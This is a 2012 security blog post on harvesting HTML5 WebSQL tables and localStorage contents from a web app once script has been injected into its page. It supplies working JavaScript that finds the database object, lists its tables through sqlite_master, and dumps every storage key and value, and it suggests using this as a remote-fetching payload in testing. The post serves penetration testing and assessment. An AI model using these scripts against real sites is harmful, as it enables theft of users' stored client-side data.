Saturday, January 07, 2012

Blind WebSQL and Storage extraction for HTML5 Apps


HTML5 is having two important data points – WebSQL and Storage. They are controlled by well defined RFCs and specifications. These APIs can be accessed using JavaScript. Assuming we get an entry into DOM then also we are completely blind with WebSQL table names and storage keys. Here is a way to enumerate that data during pen-testing and assessments.

Blind WebSQL Enumeration

We need following information to extract target content.

1.       Database object
2.       Table structure created on SQLite
3.       User table on which we need to run select query

Here is the script which can harvest database with zero knowledge

var dbo;
var table;
var usertable;
for(i in window){
                obj = window[i];
                try{
                                if(obj.constructor.name=="Database"){
                                                dbo = obj;
                                                                obj.transaction(function(tx){
                                                                tx.executeSql('SELECT name FROM sqlite_master WHERE type=\'table\'',[],function(tx,results){
                                                                                table=results;                                                                                                                                      
                                                                },null);
                                                });
                                }
                }catch(ex){}
}
if(table.rows.length>1)
                usertable=table.rows.item(1).name;

a.)    We will run through all objects and get object where constructor is “Database”
b.)    We will make Select query directly to sqlite_master database
c.)     We will grab 1st table leaving webkit table on 0th entry

We got the actual table name residing on WebSQL for this application, next we can run SQL query and loop through results.

We got the name of the table and now we can use same database object to run the query through script.


Hence, it can be part of payload during testing to fetch data remotely.

Blind Storage Enumeration

Storage enumeration is relatively easy, We can check for object length for local or session storage and if it is not zero run a loop and get all values. We can use following code for localStorage.

if(localStorage.length){
                console.log(localStorage.length)
                for(i in localStorage){
                                console.log(i)
                                console.log(localStorage.getItem(i));
                }
}

Here is the output for the call.